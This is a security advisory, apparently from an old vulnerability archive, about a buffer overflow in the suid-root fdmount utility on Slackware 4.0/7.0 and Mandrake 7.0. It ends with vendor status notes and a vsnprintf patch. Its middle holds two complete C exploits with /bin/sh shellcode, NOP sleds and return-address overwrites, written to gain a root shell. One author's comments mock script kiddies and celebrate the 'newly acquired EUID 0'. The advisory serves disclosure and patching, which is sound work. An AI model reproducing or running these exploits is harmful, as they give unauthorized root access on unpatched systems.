COMMAND
fdmount
SYSTEMS AFFECTED
Slackware Linux 4.0, 7.0 (fdmount .8), Mandrake 7.0
PROBLEM
Arend-Jan Wijtzes found following. This program is normally only
executable by members of group 'floppy' and installed suid-root
by default. Bug details:
void msg(char *text,...) {
char buff[80];
va_list p;
va_start(p,text);
vsprintf(buff,text,p);
va_end(p);
printf("%s (%s): %s\n",progname,curdev,buff);
}
It can, for example, be overflowed with a large enough
non-existing mountpoint parameter:
fdmount fd0
/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/
Segmentation fault
It seems a simple excersise to exploit this. The whole program's
code is bad news for security, and it would not surprise me if
there are more flaws to be found here. From the man page fdmount
(1), section 'bugs':
* Probably not very secure yet (when running suid
root). Untested with ext and xia filesystems.
Ofcourse, you must be in group 'floppy' to exploit this.
/*
* fdmount 0.8 buffer-overflow exploit (fd-ex.c)
* (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
*
* Systems tested: Slackware Linux 7.0
*
* Remember: you have to be a member of floppy group to exploit it!
*/
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 180
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/usr/bin/fdmount fd0 $RET");
}
Following exploit works on Slackware 4.0 and 7.0. The exploit
below was coded by Scrippie of buffer0verfl0w security.
/*
Welcome dear reader - be it scriptkiddy, whose sole intent it is to
destroy precious old Unix boxes or Assembly Wizard whose sole intent it
is to correct my code and send me a flame.
The fdutils package contains a setuid root file that is used by the floppy
group to mount and unmount floppies. If you are not in this group, this
exploit will not work.
This thingy was tested on Slackware 4.0 and 7.0
Use as: fdmount-exp [offset] [buf size] [valid text ptr]
Since the char * text is overwritten in void errmsg(char *text) we should
make sure that this points to a valid address (something in the .data
section should do perfectly). The hard coded one used works on my box,
to find the one you need use something like:
objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
cut -d " " -f1
The HUGE number of nops is needed to make sure this exploit works.
Since it Segfaults out of existence without removing /etc/mtab~ we
only get one try...
Take care with your newly aquired EUID 0!
Cheers go out to: #phreak.nl #b0f #hit2000 #root66
The year 2000 scriptkiddie award goed to: Gerrie Mansur
Love goes out to: Hester, Maja (you're so cute!), Dopey
-- Yours truly,
Scrippie - ronald@grafix.nl - buffer0verfl0w security
- #phreak.nl
*/
#include <stdio.h>
#define NUM_NOPS 500
// Gee, Aleph1 his shellcode is back once more
char shellcode[] =
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
int buf_size = 71;
int offset=0, i;
char *overflow;
char *ovoff;
long addr, ptr=0x0804c7d0;
if(argc>1) offset = atoi(argv[1]);
if(argc>2) buf_size = atoi(argv[2]);
if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);
printf("##############################################\n");
printf("# fdmount Slack 4/7 exploit - by Scrippie #\n");
printf("##############################################\n");
printf("Using offset: %d\n", offset);
printf("Using buffer size: %d\n", buf_size);
printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", ptr);
if(!(overflow = (char *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}
overflow[0] = '/';
for(i=1;i<buf_size;i++) {
overflow[i] = 0x90;
}
addr = get_sp() - offset;
printf("Resulting address: 0x%x\n", addr);
memcpy(overflow + strlen(overflow), (void *) &addr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
ovoff = overflow + strlen(overflow);
for(i=0;i<NUM_NOPS;i++) {
*ovoff = 0x90;
*ovoff++;
}
strcpy(ovoff, shellcode);
execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, NULL);
return 0;
}
SOLUTION
Using strncpy and vsnprintf would fix things. Debian 2.1, 2.2,
2.3: fdmount is NOT installed suid. As for Mandrake all their
security system is handle via msec, in this case they add a user
in the floppy group only if they are in level >= 3. So they are
not affected if by default you did an Server install or set your
security level to 4 5. Mandrake is affected if (and only if) the
user is in the floppy group. A fix (remove suid root) comes soon.
TurboLinux is also NOT affected "as shipped" by this particular
vulnerability, because users are never automatically added to the
floppy group. fdmount *is* suid root, however, and they will be
releasing an updated package shortly.
Red Hat Linux does not ship fdmount.
Here is a patch to correct the fdmount problem...
--- fdmount.c.orig Tue May 23 18:48:40 2000
+++ fdmount.c Tue May 23 18:49:04 2000
@@ -127,9 +127,10 @@
void errmsg(char *text,...) {
char buff[80];
+
va_list p;
va_start(p,text);
- vsprintf(buff,text,p);
+ vsnprintf(buff, 80, text,p);
va_end(p);
if(use_syslog)
syslog(LOG_ERR, "%s: %s\n",curdev,buff);
A patched fdmount which replaces the offending sprintf() call
with a vsnprintf() (thus closing the hole and eliminating the
security risk) has been posted in an updated floppy.tgz package
in Slackware-current. Please download the new floppy.tgz and run
upgradepkg on it:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/a1/floppy.tgz